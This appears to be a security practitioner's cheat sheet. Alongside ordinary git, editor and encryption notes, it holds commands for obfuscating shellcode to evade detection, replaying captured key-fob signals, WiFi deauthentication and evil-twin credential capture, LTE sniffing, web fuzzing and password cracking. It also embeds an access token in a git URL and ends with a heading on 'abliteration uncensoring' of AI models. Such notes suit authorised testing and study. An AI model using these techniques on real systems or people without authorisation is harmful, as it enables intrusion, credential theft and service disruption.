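git log --oneline --merges   # prints nothing: history is linear
```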

push using PAT via HTTPS

git remote add origin https://username:thisismypattoken@gitea.aperture.ad/username/proj.git

stash

# stash changes in the current branch
git stash

# list stashed changes
git stash list
# inspect stashed changes
git stash show

# apply stashed changes
git stash apply
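A throwaway-repository sketch of the stash round-trip (file name and identity are placeholders):

```shell
set -e
cd "$(mktemp -d)"
git init -q
git config user.email demo@example.com
git config user.name demo
echo v1 > notes.txt
git add notes.txt && git commit -qm 'initial'

echo v2 > notes.txt    # uncommitted change
git stash -q           # working tree back to the committed state
grep v1 notes.txt      # prints: v1

git stash apply -q     # change restored; the stash entry is kept
grep v2 notes.txt      # prints: v2
```

Note that apply keeps the entry in git stash list; use git stash pop to apply and drop it in one step.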

mingw

clangd w mingw

While setting up a C cross-development environment on GNU/Linux targeting Microsoft Windows, you may face a clangd error stating “Only Win32 target is supported!”. Even after you include the correct-architecture directory in CompileFlags for header search with the -I compiler flag, do not forget to change the compiler itself by specifying the “Compiler” key in the project’s .clangd configuration file.

CompileFlags:
    Add: [-I/usr/lib/mingw64-toolchain/x86_64-w64-mingw32/include]
    Compiler: /usr/lib/mingw64-toolchain/bin/x86_64-w64-mingw32-c++

The error is raised by an #if preprocessor check in the headers; you can inspect clangd’s diagnostics with:

clangd --check=./main.cpp 2>&1 | grep 'E\['

nvim

inline latex rendering support

  • ensure snacks.nvim is installed and you are using a supported terminal for graphics (such as kitty)
  • install pdflatex, texlive-collection-latexextra and texlive-standalone (fedora) or just texlive-full (debian)
  • install mermaid-cli using sudo npm install -g @mermaid-js/mermaid-cli
  • sudo npm install -g tree-sitter-cli
  • :TSInstall latex

You can now test it using neorg for example:

@math
\[
\LaTeX \text{ is W}
\]
@end

$n = 7 \implies \phi(7) = \#\{1,2,3,4,5,6\} = 6$

Obfuscation

Codecepticon

Usage

# install prerequisites  (.NET VSC, Roslyn)
git clone https://github.com/sadreck/Codecepticon.git
cd Codecepticon/Codecepticon
dotnet build

### --path should be a path to an sln !!!
### thus, generate an sln and add your project as a reference to that sln :
# VSCommunity => File => New => Project => Empty Solution
# VSCommunity => File => Add => Existing Project
# VSCommunity => Build => Publish Selection                       # needed in order for reference to appear in .sln

# obfuscate
cd Codecepticon/Codecepticon/bin/Debug/net472/
.\Codecepticon.exe --action obfuscate --module csharp --verbose --path "C:\Users\Administrator\Downloads\repos\Solution1\Solution1.sln" --rename ncefpavs --rename-method markov --markov-min-length 3 --markov-max-length 9 --markov-min-words 3 --markov-max-words 4

OLLVM

Build

FROM ubuntu:18.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y \
    build-essential \
    git \
    cmake \
    python \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /usr/src
RUN git clone -b llvm-4.0 https://github.com/obfuscator-llvm/obfuscator.git

WORKDIR /usr/src/build

RUN cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_INCLUDE_TESTS=OFF ../obfuscator/

RUN make -j$(nproc)

RUN ./bin/clang --version

CMD ["/bin/bash"]
sudo docker build -t obfuscator-llvm .
sudo docker cp $CONTAINER_ID:/usr/src/build/bin ~/utils/ollvm/
sudo docker cp $CONTAINER_ID:/usr/src/build/lib ~/utils/ollvm/
sudo docker cp $CONTAINER_ID:/usr/src/build/include ~/utils/ollvm/

PIC

SGN

Usage

docker pull egee/sgn
ls ~/utils/shellcode.bin
docker run -it -v ~/utils:/data egee/sgn -a 64 /data/shellcode.bin
ls ~/utils/shellcode.bin.sgn

garble

Usage

go install mvdan.cc/garble@latest

# `go build ...` ->
garble -literals -tiny build ...

vs EDR

WPF abuse to silence an agent

Runtime obfuscation

active return address spoofing (synthetic stackframes, moonwalk)

https://github.com/NtDallas/Draugr https://github.com/HulkOperator/Spoof-RetAddr

RF

ADSB

General

Replay

HackRF

# capture at 315.000 MHz with a 2 MHz sample rate and save to a file called "unlock.rx"
sudo hackrf_transfer -s 2000000 -f 315000000 -r unlock.rx

# transmit file contents with 47 db (maximum) gain
sudo hackrf_transfer -s 2000000 -f 315000000 -t unlock.rx -x 47

Resources

Spectrum analysis

General

HackRF

hackrf_sweep can be manually called as follows:

hackrf_sweep -f 1800:1900 -r output.csv

QSpectrumAnalyzer is more convenient to use. File -> Settings -> Backend == hackrf_sweep to use hackrf_sweep. Tested on hackrf FW 2024.02.1

Utils

HackRF

flash

grab from here - https://github.com/mossmann/hackrf

# just run the following command and reconnect the board
sudo hackrf_spiflash -w firmware-bin/hackrf_one_usb.bin

# run to ensure firmware got flashed
sudo hackrf_info

Flash dump

Native

esptool

# display info about the chip (including the flash size which is important)
esptool.py --chip esp8266 --port /dev/ttyUSB0 flash_id
# Manufacturer: 68
# Device: 4016
# Detected flash size: 4MB

# dump flash memory to a file called full_flash.bin (0x400000 == 4MB)
esptool.py --chip esp8266 --port /dev/ttyUSB0 read_flash 0x00000 0x400000 full_flash.bin

Cellular

LTE sniffing

LTESniffer Setup in docker

https://github.com/SysSec-KAIST/LTESniffer

  1. Compile:
FROM ubuntu:20.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y \
    build-essential \
    git \
    cmake \
    libfftw3-dev \
    libmbedtls-dev \
    libboost-all-dev \
    libconfig++-dev \
    libsctp-dev \
    libglib2.0-dev \
    libudev-dev \
    libcurl4-gnutls-dev \
    qtdeclarative5-dev \
    libqt5charts5-dev \
    python3-dev \
    python3-mako \
    python3-numpy \
    python3-requests \
    python3-setuptools \
    python3-ruamel.yaml \
    libhackrf-dev \
    libsoapysdr-dev \
    soapysdr-module-hackrf \
    soapysdr-tools \
    hackrf \
    automake \
    libncurses5-dev \
    libusb-1.0-0-dev \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /root
RUN git clone https://github.com/EttusResearch/uhd.git && \
    cd uhd && \
    # Checkout a stable 4.x release
    git checkout v4.6.0.0 && \
    cd host && \
    mkdir build && \
    cd build && \
    cmake .. && \
    make -j$(nproc) && \
    make install && \
    ldconfig

WORKDIR /root
RUN git clone https://github.com/SysSec-KAIST/LTESniffer.git && \
    cd LTESniffer && \
    mkdir build && \
    cd build && \
    cmake ../ && \
    make -j$(nproc)

WORKDIR /root/LTESniffer/build/src
CMD ["/bin/bash"]
docker build -t ltesniffer-hackrf .
  2. Pass the device to a container (determine IDs from lsusb, e.g. Bus 001 Device 060: HackRF)
docker run -it --rm \
  --device=/dev/bus/usb/001/060 \
  -v ~/test/ltesniffer/data:/data \
  ltesniffer-hackrf
  3. Ensure the device is recognized
SoapySDRUtil --probe="driver=hackrf"
  4. Determine the downlink frequency, e.g. via Cellular-Z (cellular-z displays it as FREQ downlink/uplink)

  5. Launch

# -A Number of RX antennas [Default 1]
# -W Number of concurrent threads [2..W, Default 4]
# -C Enable cell search, default disable
# -m Sniffer mode, 0 for downlink sniffing mode, 1 for uplink sniffing mode
# -g RF fix RX gain [Default AGC]
# -f Downlink Frequency
# -a RF args [Default ]

# considering the downlink frequency determined is 1845.2 MHz
./LTESniffer -f 1845.2e6 -m 0 -g 60 -a "driver=hackrf"

WiFi

Misc

put an interface into monitor mode

# place a wireless interface into monitor mode
airmon-ng start wlan0

### ALTERNATIVELY:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

set a specific channel to a wireless interface

iwconfig wlp1s0f0u8 channel 5

WPA-E ET

eaphammer --cert-wizard
# make sure everything completed successfully

# working: if certificate validation
# is not configured on the supplicant,
# it auto-connects and is successfully
# downgraded to GTC when MSCHAPv2
# is not explicitly specified
./eaphammer --bssid 1C:7E:E5:97:79:B1 \
--essid Example \
--channel 2 \
--interface wlan0 \
--auth wpa-eap \
--creds

IMPACT:

  • inner GTC : plaintext credentials
  • inner MSCHAPv2 : NetNTLMv1 hash

airodump-ng

  1. use “a” key to collapse sections!
  2. if it doesn’t work, try replugging the adapter! It SHOULD work right after replugging by just running airodump-ng! No additional actions!
### SECTIONS
## APs:
# BSSID   - AP MAC address
# ESSID   - AP readable identifier
# CH      - AP channel (frequency range)

## STATIONS:
# BSSID   - MAC of an AP the station is connected to
# Probes  - ESSIDs this client has probed 
# STATION - MAC of a station


###############
### GENERAL ###
###############
# scan near APs
airodump-ng wlan0
# scan specific AP
airodump-ng --bssid CE:9D:A2:E2:9B:40 wlan0

deauth

  1. It usually takes a client 3-5 seconds to authenticate back, which means you can easily DoS it.
  2. Before sending, ensure your interface is locked to a single channel (not hopping). It can hop channels if you are simultaneously monitoring with airodump-ng, so stop it first (or start it with the "-c" parameter to pin the channel, e.g. -c 11) and set the channel with iwconfig.
# send unicast deauth frame against a specific station (client) 
aireplay-ng -0 1 -a "CE:9D:A2:E2:9B:40" -c "10:F0:05:16:F6:9E" wlp1s0f0u8

# send broadcast deauth frame impersonating an AP
aireplay-ng -0 1 -a "CE:9D:A2:E2:9B:40" wlp1s0f0u8

Serial

UART

FTDI FT232H

DOC: breakout pinout

sudo su
python3 -m venv ./
. ./bin/activate

# <https://eblot.github.io/pyftdi/installation.html>
pip install pyftdi

# determine URL
sudo ./bin/ftdi_urls.py

pyftdi provides a ready-to-use utility for UART communication

python3 bin/pyterm.py ftdi://ftdi:232h:1:46/1

Generic

  • TX - RX
  • RX - TX
  • GND - GND
ls -ltr /dev/*USB*

sudo picocom -b 115200 /dev/ttyUSB0

UEFI

EFI shell

Installation

Installing EFI shell:

### the standard EFI boot binary location is /efi/boot/bootx64.efi
mount /dev/sdb1 /efi && cd /efi
mkdir EFI/boot && cd EFI/boot
wget https://github.com/tianocore/edk2/raw/UDK2018/ShellBinPkg/UefiShell/X64/Shell.efi -O bootx64.efi
# where /dev/sdb1 must be fat32 formatted partition with "efi system" gpt label
# make sure no other efi/boot/bootx64.efi binaries are present on other partitions

Usage

# show mapping table
map

# set directory to storage device
$DEVICE_NAME:
# e.g.
FS0:

# load an EFI driver
load ./bin.efi

# execute a binary
./path/to/bin

Recon

DAST

nuclei

# generic scan (default fingerprinting templates)
nuclei -u https://example.com

# use with a custom template
nuclei -u https://example.com -t ./my-template.yaml

# use with multiple URLs and multiple templates
git clone https://github.com/projectdiscovery/nuclei-templates.git
nuclei -l urls.txt -t 'nuclei-templates/passive/cves/2024/*.yaml'

Fuzzing

ffuf

### OPTIONS
-c                  # colorize output
-mc 200,301         # match status codes
-fc 404             # filter out status codes from responses
-u URL              # target URL (FUZZ marks the injection point)
-w WORDLIST_PATH    # wordlist
-recursion          # recurse into discovered directories
-e .exe             # append extensions (e.g. .exe)
-s                  # silent
-of html            # output format (html)
-o output-file      # output file
-b "cookie1=smth; cookie2=smth"     # cookies
-H "X-Custom-Header: smth"          # custom header
-se                 # stop on errors
-p 2                # 2 second delay between requests
-t 150              # threads


################
### EXAMPLES ###
################
# classic directory FUZZ
ffuf -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

ffuf -c -mc 200,301 -fc 404 -u http://example.com/FUZZ -w ~/seclists/discovery/web-content/raft-large-words.txt -t 150 -e '.php,.html'
ffuf -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-large-words.txt -t 150 -e $(cat /root/SecLists/Discovery/Web-Content/web-extensions-comma_separated.txt)

# FUZZ HTTP verbs
ffuf -c -u 'http://WIN-KML6TP4LOOL.CONTOSO.ORG' -X FUZZ -w ~/SecLists/Fuzzing/http-request-methods.txt

# recursive directory FUZZ
ffuf -c -fc 404 -u http://example.com/FUZZ -recursion -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

# FUZZ when on different subdomain (without adding it to /etc/hosts)
ffuf -c -H 'Host: something.example.com' -w '~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt' -u 'http://example.com/FUZZ'

# single IP subdomain enumeration (note that `-u` only points at the IP; to enumerate subdomains served from a specific IP you FUZZ the Host header) (if you wanna enumerate DNS instead, see * gobuster)
ffuf -c -H 'Host: FUZZ.example.com' -w '~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt' -u 'http://example.com'

# multiple wordlists (default mode is clusterbomb (all combinations))
ffuf -c -mode pitchfork -H 'Host: SUBD.example.com' -u 'http://example.com/PATH' -w '~/wordlist_subdomain.txt:SUBD' -w '~/wordlist_path.txt:PATH' -replay-proxy 'http://127.0.0.1:8080'

# FUZZ ports in the request file
# (let's say we have a plain request from burp with a SSRF and we wanna enumerate ports)
# see HTB Editorial: https://youtu.be/eggi_GQo9fk?t=467
ffuf -request ssrf.txt -request-proto http -w <(seq 1 65535)
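The `<(seq 1 65535)` process substitution just hands ffuf a temporary wordlist of port numbers, one per line; you can preview it directly (bash required):

```shell
# preview the generated port wordlist
head -n 3 <(seq 1 65535)
# 1
# 2
# 3
```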

# rate limit
ffuf -rate 20 -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

# forward to burp
# in burp, i add new proxy at 3333 and tell it to forward to 9595
ffuf -c -u http://localhost:3333/ # ...

Hashcracking

hashcat

### OPTIONS
--help              # display hash types
-m [hash_type]      # specify hash type
-a [mode]           # specify attack mode (0 wordlist, 1 combination, 3 mask, 6 wordlist+mask, 7 mask+wordlist)
-O                  # enable optimized kernel mode

--increment         # progressively grow the applied mask by one position


################
### EXAMPLES ###
################
hashcat -O -a 0 -m 3200 hash.txt ~/SecLists/rockyou.txt
hashcat 'iamthehash'                                           # determine hash type
hashcat -O -a 0 -m 1800 '$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/' ~/SecLists/rockyou.txt

# Cracked password is supplied in the following format:
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho


### Hashcat show examples for pbkdf2 + sha256
hashcat --example-hashes --machine-readable | grep -i pbkdf2 | grep sha256


### MASKS
# https://hashcat.net/wiki/doku.php?id=mask_attack
hashcat -m 1400 -O -a 3 --increment 'abeb6f8eb5722b8ca3b45f6f72a' 'susan_nasus_?d?d?d?d?d?d?d?d?d?d'

hashcat -m 1400 -O -a 6 "somehash" example.dict ?d?d?d?d
# password0000
# password0001

hashcat -m 1400 -O -a 7 "somehash" ?d?d?d?d example.dict
# 0000password
# 0001password

hashcat -m 1400 -O -a 7 "somehash" dict1.txt dict2.txt
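Cracked results come back in the `hash:plaintext` format shown earlier; since the hash portion contains no colon, printing the last colon-separated field recovers the password (a sketch using the bcrypt example from this section):

```shell
# pull the plaintext out of hashcat's hash:plaintext output line
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho' \
  | awk -F: '{print $NF}'
# tequieromucho
```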

john

# john works with files, store hash into a file first
echo 'dsgf27g86df26f287df86f3' | tee -a hash.txt

# determine possible formats
john --show=formats hash.txt

# crack using a specific format
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# crack using all formats
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
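To try the Raw-MD5 example against a known answer first, you can generate a test hash yourself (the test password 'password' is an assumption; it is present in rockyou.txt):

```shell
# create a Raw-MD5 test hash to practice cracking on
printf '%s' 'password' | md5sum | awk '{print $1}' | tee hash.txt
# 5f4dcc3b5aa765d61d8327deb882cf99
```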

CLI

LUKS

create LUKS directory-in-file

https://www.lpenz.org/articles/luksfile/

dd if=/dev/zero of=cryptfile.img bs=1M count=64
sudo cryptsetup luksFormat cryptfile.img
sudo cryptsetup luksOpen cryptfile.img cryptdev
sudo mkfs.ext4 /dev/mapper/cryptdev
sudo cryptsetup luksClose cryptdev

# mount
sudo cryptsetup luksOpen cryptfile.img cryptdev
sudo mount -t auto /dev/mapper/cryptdev ./cryptdir

# umount
sudo umount cryptdir
sudo cryptsetup luksClose cryptdev

gpg

keys

gpg --full-gen-key
gpg --list-keys
gpg --edit-key user-id

message exchange

# export public key from a keyring to a file
gpg --output $FILE --export $KEY_UID            # add --armor to export in ASCII
# encrypt a file to a recipient's public key
gpg --output $OUT_FILE --encrypt --recipient $KEY_UID $FILE

signature verification

Retrieves the signing key ID from the .sig file and fetches the public key from a remote keyserver

gpg --keyserver-options auto-key-retrieve --verify Downloads/archlinux-2023.09.01-x86_64.iso.sig Documents/archlinux-2023.09.01-x86_64.iso

openssl

generate certificate with SAN for Proxmox

openssl req -new -newkey rsa:2048 -nodes -keyout pve.key -out pve.csr \
  -subj "/OU=PVE Cluster Node/O=Proxmox Virtual Environment/CN=pve.aperture.ad" \
  -addext "subjectAltName=DNS:pve.aperture.ad,DNS:127.0.0.1,DNS:localhost,DNS:pve,DNS:192.168.88.69" && \
openssl x509 -req -in pve.csr -CA k8s-aperture-root-ca-01.crt -CAkey k8s-aperture-root-ca-01.key \
  -CAcreateserial -out pve.crt -days 365 -sha256 \
  -extfile <(printf "subjectAltName=DNS:pve.aperture.ad,DNS:127.0.0.1,DNS:localhost,DNS:pve,DNS:192.168.88.69")
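To sanity-check the `-addext` SAN syntax without touching the real CA, you can issue a throwaway self-signed cert and inspect it (requires OpenSSL 1.1.1+; the file names here are placeholders):

```shell
# throwaway self-signed cert with a SAN
openssl req -x509 -newkey rsa:2048 -nodes -keyout t.key -out t.crt -days 1 \
  -subj "/CN=pve.aperture.ad" \
  -addext "subjectAltName=DNS:pve.aperture.ad,DNS:localhost"
# confirm the SAN extension landed in the certificate
openssl x509 -in t.crt -noout -ext subjectAltName
```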

pass

usage

gpg --full-gen-key
pass init $GPG_ID                   # will reencrypt

# Usage
pass ls                             # list passwords
pass insert dir/file                # Insert password
pass -c dir/file                    # Copy password to clipboard
pass edit dir/file                  # Insert other fields
pass generate dir/file $NUM         # Generate password

# change pass dir (should have .gpg-id file)
export PASSWORD_STORE_DIR=/mnt/sda1/my/password/storage

FW RE

Misc

extract Linux kernel from a zImage compressed with LZMA

vmlinux-to-elf

./vmlinux-to-elf <input_kernel.bin> <output_kernel.elf>

mount jffs2, because binwalk is unable to

mount.jffs2

  binwalk -Mqe 01-00000024-U00000024.bin

  cd _01-00000024-U00000024.bin.extracted/_0.extracted

  mkdir jffs2_root

  sudo mount.jffs2 0.jffs2 jffs2_root
  # Sanity check passed...
  # Image 0.jffs2 sucessfully mounted on jffs2_root

  cd jffs2_root && ls
  # bin  cfez.bin  config  lib  Megafon  webroot

unpack android bootimg

android-unpackbootimg

mkdir kernel && unpackbootimg -i 03-00030000-Kernel.bin -o kernel && cd kernel
# Android magic found at: 128
# BOARD_KERNEL_CMDLINE root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0,115200 rdinit=/init loglevel=5 mem=0x9200000
# BOARD_KERNEL_BASE 55e08000
# BOARD_NAME
# BOARD_PAGE_SIZE 2048
# BOARD_HASH_TYPE sha1
# BOARD_KERNEL_OFFSET 00008000
# BOARD_RAMDISK_OFFSET 01000000
# BOARD_SECOND_OFFSET 00f00000
# BOARD_TAGS_OFFSET 00000100

binwalk

usage

# recursive extract
binwalk -Me 01-00000010-U00000010.bin

# attempt to extract each datatype from its starting address to its ending address
ls -l _01-00000010-U00000010.bin.extracted

RE

Utils

windbg

Usage

https://github.com/f1zm0/WinDBG-Cheatsheet

# print memory state at the address specified in ESP pointer
db esp
# print 200 bytes
db esp L200

# disassemble the function `GetCurrentThread` in `kernel32` DLL
u kernel32!GetCurrentThread

# show registers
r

display security descriptor at address

!sd $ADDRESS

Ace0 will contain the S-1-0-0 SID (all users). Use the following script to decode this mask: https://raw.githubusercontent.com/Xacone/Eneio64-Driver-Exploits/refs/heads/main/sd.py

0x00010000: "DELETE",
0x00020000: "READ_CONTROL",
0x00040000: "WRITE_DAC",
0x00080000: "WRITE_OWNER",
0x00100000: "SYNCHRONIZE",
0x00000001: "FILE_READ_DATA",
0x00000002: "FILE_WRITE_DATA",
0x00000004: "FILE_APPEND_DATA",
0x00000008: "FILE_READ_EA",
0x00000010: "FILE_WRITE_EA",
0x00000020: "FILE_EXECUTE",
0x00000040: "FILE_DELETE_CHILD",
0x00000080: "FILE_READ_ATTRIBUTES",
0x00000100: "FILE_WRITE_ATTRIBUTES",
0x00020000: "STANDARD_RIGHTS_READ",
0x00020000: "STANDARD_RIGHTS_WRITE",
0x00020000: "STANDARD_RIGHTS_EXECUTE",
0x001f0000: "STANDARD_RIGHTS_ALL",
0x10000000: "GENERIC_ALL",
0x20000000: "GENERIC_EXECUTE",
0x40000000: "GENERIC_WRITE",
0x80000000: "GENERIC_READ",
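The same bitmask check can be sketched in shell for a handful of the flags above; the `mask` value below is a made-up example, not output from a real target:

```shell
# decode a few of the access-mask flags (mask is a made-up example)
mask=0x001200a9
for entry in 0x00020000:READ_CONTROL 0x00100000:SYNCHRONIZE 0x00000001:FILE_READ_DATA; do
  bit=${entry%%:*} name=${entry#*:}
  # print the flag name if all of its bits are set in the mask
  (( (mask & bit) == bit )) && echo "$name"
done
# READ_CONTROL
# SYNCHRONIZE
# FILE_READ_DATA
```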

display structure property under specified address

DEVICE_OBJECT structure

typedef struct _DEVICE_OBJECT {
  PSECURITY_DESCRIPTOR SecurityDescriptor;
}
# return structure definition
dt $STRUCT
dt _DEVICE_OBJECT

# return specific structure
dt $STRUCT $ADDRESS
dt _DEVICE_OBJECT ffffe2010f21b780

# return specific attribute within the specific structure
dt $STRUCT $ADDRESS $ATTRIBUTE
dt _DEVICE_OBJECT ffffe2010f21b780 SecurityDescriptor

search base address of a function by its symbol

# ensure symbols
.symfix
# reload ntdll.dll with symbols
.reload /f ntdll.dll

# display base address of an NtTraceEvent function within ntdll.dll by it's symbol
x ntdll!NtTraceEvent

# disassemble the function
uf ntdll!NtTraceEvent

set conditional breakpoint when a certain value gets pushed into register

In order to stop when 0x00007ffcf3fa56f0 is pushed into RCX during function execution:

Find the function offset. To set a breakpoint on a function you need its address relative to the module base (in our case the module is the executable itself).

In ghidra the function's VA is 140004be1, but ghidra's image base differs from the runtime one: for an x64 PE the default image base is 0x140000000, and that is what ghidra uses.

Display image base in ghidra: Window -> Memory map -> Set Image Base (house icon)

Display image base in windbg:

0:000> !dh executable_name -f
# 00007ff7a3a10000 image base

Now you must compute an RVA by subtracting image base from VA:

140004be1 - 140000000 = 0x4be1
bp executable_name+0x4be1 "j (@rcx == 0x00007ffcf3fa56f0) ''; 'gc'"
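The subtraction can be double-checked in any shell:

```shell
# RVA = VA - image base (values from the example above)
va=0x140004be1
base=0x140000000
printf '0x%x\n' $((va - base))
# 0x4be1
```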

windows driver debugging setup

# change the boot configuration to enable kernel debugging (/debug option)
# BitLocker and secureboot need to be disabled first
bcdedit -debug on
  1. Launch windbg
  2. File -> Attach to kernel -> Local -> OK

BinExp

Utils

gdb-pwndbg

gdb-pwndbg ./file


# place a breakpoint at main
break main

# continue program execution
continue

# list functions
info functions

# run the program
run
run < payload.bin

# print the first 20 stack entries
stack 20

# step into
si
# step over (next instruction)
ni


# generate cyclic 200 symbols
cyclic 200
# find offset of "waab"
cyclic -l waab


# breaks when EIP will be equal to 0xffff0d98 (insert while running)
watch $eip == 0xffff0d98



# display virtual memory map
vmmap

Applied

StT

whisper

Usage

git clone https://github.com/ggerganov/whisper.cpp
cd whisper.cpp
cmake -B build
cmake --build build -j --config Release

Transcribe:

arecord -r 16000 -c 1 -f S16_LE /tmp/input.wav || true
ffmpeg -y -i /tmp/input.wav -ar 16000 -ac 1 -c:a pcm_s16le /tmp/output.wav > /dev/null 2>&1
~/utils/whisper.cpp/build/bin/whisper-cli -m ~/utils/whisper.cpp/models/ggml-base.en.bin -f /tmp/output.wav

Data manipulation

Abliteration uncensoring